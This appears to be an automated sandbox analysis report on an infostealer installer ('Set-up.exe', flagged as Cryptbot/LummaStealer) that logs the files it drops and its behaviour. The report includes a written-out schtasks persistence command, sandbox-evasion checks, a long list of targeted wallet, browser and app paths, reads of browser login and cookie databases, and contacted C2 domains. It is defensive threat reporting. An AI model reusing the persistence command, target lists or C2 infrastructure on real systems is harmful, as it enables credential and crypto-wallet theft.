Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: sinpvqubstltlenwdjhl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: sinpvqubstltlenwdjhl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: sinpvqubstltlenwdjhl.dll	Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: Set-up.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: Set-up.exe

Static file information: File size 9964544 > 1048576

Source: Set-up.exe	Static PE information: Raw size of .text is bigger than: 0x100000 < 0x2be400
Source: Set-up.exe	Static PE information: Raw size of .data is bigger than: 0x100000 < 0x671000

Source: Set-up.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_007B8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

5_2_007B8230

Source: Set-up.exe	Static PE information: section name: .eh_fram
Source: service123.exe.1.dr	Static PE information: section name: .eh_fram
Source: siNpVQuBSTLTLeNwdJHL.dll.1.dr	Static PE information: section name: .eh_fram

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_007BA521 push es; iretd	5_2_007BA694
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CAD0C30 push eax; mov dword ptr [esp], edi	5_2_6CAD0DAA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA9ED10 push eax; mov dword ptr [esp], ebx	5_2_6CA9EE33
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA74E31 push eax; mov dword ptr [esp], ebx	5_2_6CA74E45
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA68E7A push edx; mov dword ptr [esp], ebx	5_2_6CA68E8E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA6A947 push eax; mov dword ptr [esp], ebx	5_2_6CA6A95B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA70AA2 push eax; mov dword ptr [esp], ebx	5_2_6CA70AB6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA88AA0 push eax; mov dword ptr [esp], ebx	5_2_6CA8909F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA72AAC push edx; mov dword ptr [esp], ebx	5_2_6CA72AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA9EAB0 push eax; mov dword ptr [esp], ebx	5_2_6CA9EBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CAA2BF0 push eax; mov dword ptr [esp], ebx	5_2_6CAA2F24
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CAA2BF0 push edx; mov dword ptr [esp], ebx	5_2_6CAA2F43
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA6048B push eax; mov dword ptr [esp], ebx	5_2_6CA604A1
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA604E0 push eax; mov dword ptr [esp], ebx	5_2_6CA606DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA68435 push edx; mov dword ptr [esp], ebx	5_2_6CA68449
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA88460 push eax; mov dword ptr [esp], ebx	5_2_6CA88A5F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA6A5A7 push eax; mov dword ptr [esp], ebx	5_2_6CA6A5BB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA41CFA push eax; mov dword ptr [esp], ebx	5_2_6CAF6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA41CFA push eax; mov dword ptr [esp], ebx	5_2_6CAF6622
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA606A6 push eax; mov dword ptr [esp], ebx	5_2_6CA606DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA606A2 push eax; mov dword ptr [esp], ebx	5_2_6CA606DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA786A1 push 890005EAh; ret	5_2_6CA786A9
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CAB06B0 push eax; mov dword ptr [esp], ebx	5_2_6CAB0A4F
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA666F3 push edx; mov dword ptr [esp], ebx	5_2_6CA66707
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA606FD push eax; mov dword ptr [esp], ebx	5_2_6CA606DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CAA2620 push eax; mov dword ptr [esp], ebx	5_2_6CAA2954
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CAA2620 push edx; mov dword ptr [esp], ebx	5_2_6CAA2973
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA6070E push eax; mov dword ptr [esp], ebx	5_2_6CA606DA
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA6A777 push eax; mov dword ptr [esp], ebx	5_2_6CA6A78B
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA3E0D0 push eax; mov dword ptr [esp], ebx	5_2_6CAF6AF6
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_6CA3E0D0 push edx; mov dword ptr [esp], edi	5_2_6CAF6B36

Source: C:\Users\user\Desktop\Set-up.exe	File created: C:\Users\user\AppData\Local\Temp\service123.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Set-up.exe	File created: C:\Users\user\AppData\Local\Temp\siNpVQuBSTLTLeNwdJHL.dll			Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\Set-up.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f

Source: C:\Users\user\Desktop\Set-up.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Malware Analysis System Evasion

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_5-158428

Found stalling execution ending in API Sleep call

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Stalling execution: Execution stalls by calling Sleep

graph_5-158429

Source: C:\Users\user\Desktop\Set-up.exe

Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Window / User API: threadDelayed 638

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

API coverage: 1.1 %

Source: C:\Users\user\Desktop\Set-up.exe TID: 7536	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6976	Thread sleep count: 638 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe TID: 6976	Thread sleep time: -63800s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user	Jump to behavior

Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: Set-up.exe	Binary or memory string: VMware
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: Set-up.exe, 00000001.00000003.1511633698.0000000001874000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1511322357.0000000001874000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1525528479.0000000001874000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000002.2100341753.0000000001874000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWPN
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: Set-up.exe, 00000001.00000003.1511633698.0000000001874000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1511322357.0000000001874000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000002.2100341753.000000000181E000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1525528479.0000000001874000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000002.2100341753.0000000001874000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: Set-up.exe	Binary or memory string: libgcc_s_dw2-1.dll__register_frame_info__deregister_frame_infodaoTerminalBlizzardCLR_v2.0_32DewMobileCode - Insiders\SolidDocumentsuser_data#4cardBorisFXIq-TeamGuest ProfileVideosvisa.pwdEADesktopHTML HelpGPUCachexrpSpotifyProgram Files (x86)WeModWeb Datamedia_cacheuser_data4kdownload.com.rtfPostmanInternet ExplorerlauncherUbiquiti UniFi.openshot_qtuser_data#5dumpstrxWinamp.arduinoIDERiot GamesrepositoryG HUBLedger Livejaxsidmailtdatabalena-etcher\VirtualBoxSamsung MagicianJaspersoftWorkspaceSketchUpNeteaseAugLoopupdatesMMCABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/seeedhdokiejnpimakedhajhdlcegeplioahdStorageContraseVaultHD-Playergaedmjdfmmahhbjefcbgaolhhanlaolbuser_data#3cartMPC-BELocalLowUniSDKJackbox GamesUI LauncherkkpllkodjeloidieedojogacfhpaihohtokenacmacodkjbdgmoleebolmdjonilkdbchGoogle Web DesignerwodlSavedWindows Live ContactsNFTbluestacks-servicestof_launcher\Program FilesvshubPicWish.pngEPSONUTC--2.pdflghubCode Cachenode_modulesAMS SoftwareAdguard Software LimitedAuthDictionariesXuanZhi9LogsVsGraphicsadaClickUp...SmartSteamEmuQRobs-studioiTop PDFOISimportSweetLabs App Platformbandlab-assistantHotta\@trezor\arduino-ideWindows Photo ViewerVisualStudioAmpInnovative Solutionscode.txtMSOIdentityCRLnodFPSChessCLR Security Configadspower_global\ZaloDataexchangeDRPSubilleteraUnknown %ddogeDevice MetadatanngceckbapebfimnlniiiahkandclblbgameCanonReasonSaferWebaddonsXuanZhiVOSCiscoSparkpythonProjectOPPAIMPElevatedDiagnosticsOneDriveclavepluginsMessengerMarcoMastroddiSWODISOneNotelinkClassicShellFacebookLocal Statecloudlocalization-cacheEpicGamesLauncher\LibreOfficeVMwareDaum.IdentityService.dartServermasterhakuneko-desktopDriverPack CloudSlackK-MeleonklnaejjgbibmhlephnhpmaofohgkpgkdsolDawnCache.kdbIndexedDBVirtualBox VMsMEGAsyncsyncOnDeviceHeadSuggestModelsourceASUSPerfLogsSamsungHoYoverse\MegaDownloaderfactorhifafgmccdpekplomjjkcfgodnhcelljLlaveslobs-clientOlk\MetroScreenEdgeCoredatabaseswebappdaibhhhlbepdkbapadjdnnojkbgioiodbicTikTok LIVE StudioopcgpfmipidbgpenhmajoajpbobppdilwebviewNichromeDigiartyhodliCloudDrive.quokkabinanceSenhaintegrationsemoji.metadataAdvinstAnalyticsTeamsMeetingAddinnkbihfbeogaeaoehlefnkodbefgpgknnHabbo LauncherXiaomiBlackmagic DesignGraineHoYoverseInputMethodCrashRptTeams.ACEStream.doctbs_cache\fraseProgramDataToolbarTpcdMetadataGitHub DesktopIntel_CorporationSUPERAntiSpywareEpic Games\cloud-uninstallerMeltytech.package-managerDATAparkApowersoftCLR_v4.0ThinkBuzanEAConnect_microsoftAdobeokxeurusdRiot Games\exportBackupNZXT CAM\Windows 2000 %wSPhotoWorkskeysecretCredentialsMiniTool Video ConverterholdcacheUbisoft Game Launchersentry.condapayWindows MailCacheuser_data#2CLR_v4.0_32fhmfendgdocmcbmfikdcogofphimnknoConfigtronTester.node-redFACEITimloifkgjagghnncjkhggdhalmcnfklkWordDataFolder.thinkbuzanNVIDIA Corporation\pedahtxVALORANTAdguard_Software_Limitedoptimization_guide_model_storeTextPredictionwebCachesrav-antivirus-clientBlendSteam\avaxEpicOnlineServicesUIHelperVSCommonejbalbakoplchlghecdalmeeeajn
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f
Source: Set-up.exe, 00000001.00000003.1567111770.0000000003A0E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_007B8230 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,

5_2_007B8230

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_007B116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit,	5_2_007B116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_007B1160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	5_2_007B1160
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_007B11A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,	5_2_007B11A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 5_2_007B13C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,	5_2_007B13C9

Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"			Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 5_2_6CAA84D0 cpuid

5_2_6CAA84D0

Source: C:\Users\user\Desktop\Set-up.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Users\user\Desktop\Set-up.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Clipboard Hijacker

Source: Yara match	File source: 5.2.service123.exe.6ca20000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000001.00000003.2071148102.0000000004263000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Set-up.exe PID: 7300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: service123.exe PID: 3452, type: MEMORYSTR

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7300, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Set-up.exe	String found in binary or memory: Electrum
Source: Set-up.exe	String found in binary or memory: \ElectronCash\wallets
Source: Set-up.exe, 00000001.00000002.2099936230.0000000001041000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Spoonvivaldi.exe\User DataBraveSoftware\Local\\ProfilesRoaming\Profiles\User Data\Windows Server 2008 %wSTrezor\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)before addDatAndEthFilesbefore addCryptoWalletsd->m_pPut_buf_func(cur_archive_file_ofs & (pZip->m_file_offset_alignment - 1)) == 0zip entry open Failed to open zip entryFailed to read zip entryError opening fileError writing to fileFailed to get temp pathFailed to allocate memory for ZIP data
Source: Set-up.exe	String found in binary or memory: com.liberty.jaxx
Source: Set-up.exe	String found in binary or memory: \Exodus\backup
Source: Set-up.exe	String found in binary or memory: exodus.wallet
Source: Set-up.exe	String found in binary or memory: ~Ethereum (UTC)

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\Set-up.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7300, type: MEMORYSTR

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: Set-up.exe PID: 7300, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	11 Process Injection	1 Masquerading	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	2 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Native API	1 DLL Side-Loading	1 Scheduled Task/Job	2 Virtualization/Sandbox Evasion	LSASS Memory	2 Virtualization/Sandbox Evasion	Remote Desktop Protocol	2 Data from Local System	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	11 Process Injection	Security Account Manager	1 Application Window Discovery	SMB/Windows Admin Shares	3 Clipboard Data	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	3 Obfuscated Files or Information	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Set-up.exe	42%	ReversingLabs	Win32.Trojan.LummaStealer

Source	Detection	Scanner	Label
https://ac.ecosia.org/autocomplete?q=	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	URL Reputation	safe
https://gcc.gnu.org/bugs/):	0%	URL Reputation	safe
https://duckduckgo.com/ac/?q=	0%	URL Reputation	safe
analforeverlovyu.top	0%	URL Reputation	safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	0%	URL Reputation	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	URL Reputation	safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
tventyvr20pt.top	185.244.181.140	true	true		unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
tventyvr20pt.top	true		unknown
analforeverlovyu.top	true	URL Reputation: safe	unknown
@tventyvr20pt.top	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://ac.ecosia.org/autocomplete?q=	Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/chrome_newtab	Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://gcc.gnu.org/bugs/):	siNpVQuBSTLTLeNwdJHL.dll.1.dr	false	URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://serviceupdate32.com/update	Set-up.exe	false		unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Set-up.exe, 00000001.00000003.1566655654.00000000039FB000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
